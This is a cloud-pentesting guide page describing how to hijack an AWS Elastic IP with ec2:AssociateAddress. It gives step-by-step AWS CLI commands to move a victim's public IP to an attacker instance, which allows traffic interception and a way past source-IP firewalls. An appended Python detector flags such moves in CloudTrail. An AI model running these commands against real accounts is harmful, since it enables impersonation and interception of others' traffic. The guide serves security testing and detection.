# AWS - Elastic IP Hijack for Ingress/Egress IP Impersonation

{{#include ../../../../banners/hacktricks-training.md}}

## Summary

Abuse `ec2:AssociateAddress` (and optionally `ec2:DisassociateAddress`) to re-associate an Elastic IP (EIP) from a victim instance/ENI to an attacker-controlled instance/ENI. Inbound traffic destined to the EIP is then delivered to the attacker, and the attacker can also originate outbound traffic from the allowlisted public IP, bypassing external partner firewalls that filter on source IP.

## Prerequisites

- Target EIP allocation ID in the same account/VPC.
- Attacker instance/ENI you control.
- Permissions:
  - `ec2:DescribeAddresses`
  - `ec2:AssociateAddress` on the EIP allocation-id and on the attacker instance/ENI
  - `ec2:DisassociateAddress` (optional). Note: `--allow-reassociation` auto-disassociates the EIP from its prior attachment.

## Attack

### Variables

```bash
REGION=us-east-1
ATTACKER_INSTANCE=<i-attacker>
VICTIM_INSTANCE=<i-victim>
```

1) Allocate or identify the victim's EIP (the lab allocates a fresh one and attaches it to the victim)

```bash
ALLOC_ID=$(aws ec2 allocate-address --domain vpc --region $REGION --query AllocationId --output text)
aws ec2 associate-address --allocation-id $ALLOC_ID --instance-id $VICTIM_INSTANCE --region $REGION
# quote the JMESPath expression so the shell does not treat [0] as a glob
EIP=$(aws ec2 describe-addresses --allocation-ids $ALLOC_ID --region $REGION --query 'Addresses[0].PublicIp' --output text)
```

2) Verify the EIP currently resolves to the victim service (the example checks for a banner)

```bash
curl -sS http://$EIP | grep -i victim
```

3) Re-associate the EIP to the attacker (auto-disassociates it from the victim)

```bash
aws ec2 associate-address --allocation-id $ALLOC_ID --instance-id $ATTACKER_INSTANCE --allow-reassociation --region $REGION
```

4) Verify the EIP now resolves to the attacker service

```bash
sleep 5; curl -sS http://$EIP | grep -i attacker
```

Evidence (moved association):

```bash
aws ec2 describe-addresses --allocation-ids $ALLOC_ID --region $REGION \
  --query 'Addresses[0].AssociationId' --output text
```

## Impact

- Inbound impersonation: all traffic to the hijacked EIP is delivered to the attacker instance/ENI.
- Outbound impersonation: the attacker can initiate traffic that appears to originate from the allowlisted public IP (useful to bypass partner/external source-IP filters).
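Both the single-call move (`--allow-reassociation`) and the two-step Disassociate + Associate path leave `AssociateAddress` events in CloudTrail, which is where a defender catches this. The detector below is an added example, not code from this page or from AWS: it replays CloudTrail records in time order, remembers the last instance/ENI each allocation was attached to, and raises a finding whenever an `AssociateAddress` call moves the allocation somewhere else. It assumes the `requestParameters` field names mirror the EC2 API parameter names (`allocationId`, `instanceId`, `networkInterfaceId`, `allowReassociation`) and that `userIdentity.arn` identifies the caller; the sample records, account id, ARNs and resource ids are constructed placeholders, so check the field names against a real trail before deploying.

```python
"""Flag Elastic IP re-associations in CloudTrail (added example, not from the page).

Assumptions: CloudTrail `requestParameters` for AssociateAddress mirror the EC2
API parameter names (allocationId, instanceId, networkInterfaceId,
allowReassociation) and `userIdentity.arn` names the caller. Verify against a
real trail before relying on it.
"""
import json

# Constructed sample records (not real CloudTrail output); ids are placeholders.
SAMPLE_EVENTS = [
    {   # legitimate first association by the deploy role
        "eventTime": "2024-05-01T10:00:00Z",
        "eventSource": "ec2.amazonaws.com",
        "eventName": "AssociateAddress",
        "userIdentity": {"arn": "arn:aws:sts::111122223333:assumed-role/DeployRole/ci"},
        "sourceIPAddress": "203.0.113.10",
        "requestParameters": {"allocationId": "eipalloc-0aaaaaaa",
                              "instanceId": "i-0victim000000000",
                              "allowReassociation": False},
    },
    {   # the hijack: a different principal moves the EIP in one forced call
        "eventTime": "2024-05-01T10:42:17Z",
        "eventSource": "ec2.amazonaws.com",
        "eventName": "AssociateAddress",
        "userIdentity": {"arn": "arn:aws:iam::111122223333:user/contractor"},
        "sourceIPAddress": "198.51.100.77",
        "requestParameters": {"allocationId": "eipalloc-0aaaaaaa",
                              "instanceId": "i-0attacker0000000",
                              "allowReassociation": True},
    },
    {   # explicit disassociate during the restore ...
        "eventTime": "2024-05-01T11:00:00Z",
        "eventSource": "ec2.amazonaws.com",
        "eventName": "DisassociateAddress",
        "userIdentity": {"arn": "arn:aws:sts::111122223333:assumed-role/DeployRole/ci"},
        "sourceIPAddress": "203.0.113.10",
        "requestParameters": {"associationId": "eipassoc-0002"},
    },
    {   # ... followed by re-association back to the original instance
        "eventTime": "2024-05-01T11:05:00Z",
        "eventSource": "ec2.amazonaws.com",
        "eventName": "AssociateAddress",
        "userIdentity": {"arn": "arn:aws:sts::111122223333:assumed-role/DeployRole/ci"},
        "sourceIPAddress": "203.0.113.10",
        "requestParameters": {"allocationId": "eipalloc-0aaaaaaa",
                              "instanceId": "i-0victim000000000",
                              "allowReassociation": False},
    },
]


def _target(params):
    """An EIP is attached to either an instance or an ENI."""
    return params.get("instanceId") or params.get("networkInterfaceId")


def find_eip_moves(events):
    """Return one finding per AssociateAddress that moves an allocation to a
    different instance/ENI than its last recorded attachment.

    The last known target is deliberately kept across DisassociateAddress, so
    a Disassociate followed by an Associate elsewhere is detected too."""
    last_target = {}  # allocationId -> (target, principal arn)
    findings = []
    for ev in sorted(events, key=lambda e: e["eventTime"]):  # ISO-8601 Z sorts lexically
        if ev.get("eventSource") != "ec2.amazonaws.com" or ev.get("errorCode"):
            continue  # only successful EC2 calls change the association
        if ev.get("eventName") != "AssociateAddress":
            continue
        params = ev.get("requestParameters") or {}
        principal = (ev.get("userIdentity") or {}).get("arn", "unknown")
        alloc, target = params.get("allocationId"), _target(params)
        prev = last_target.get(alloc)
        if prev and prev[0] != target:
            forced = bool(params.get("allowReassociation"))
            findings.append({
                "eventTime": ev["eventTime"],
                "allocationId": alloc,
                "from_target": prev[0],
                "to_target": target,
                "previous_principal": prev[1],
                "principal": principal,
                "sourceIPAddress": ev.get("sourceIPAddress"),
                "allowReassociation": forced,
                # a forced move in a single call is the hijack primitive on this page
                "severity": "high" if forced else "medium",
            })
        last_target[alloc] = (target, principal)
    return findings


def load_cloudtrail(path):
    """Read one CloudTrail log file ({"Records": [...]}) and return its events."""
    with open(path, encoding="utf-8") as fh:
        return json.load(fh).get("Records", [])


if __name__ == "__main__":
    for finding in find_eip_moves(SAMPLE_EVENTS):
        print(json.dumps(finding))
```

Run against a real trail with `find_eip_moves(load_cloudtrail("trail.json"))`; the first finding on the sample data is the forced move to the attacker instance by an unexpected principal, and the restore shows up as a medium-severity move so an analyst can correlate it with the change ticket. Pair the detection with an IAM policy that limits who may call `ec2:AssociateAddress` on production allocation ids.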

{{#include ../../../../banners/hacktricks-training.md}}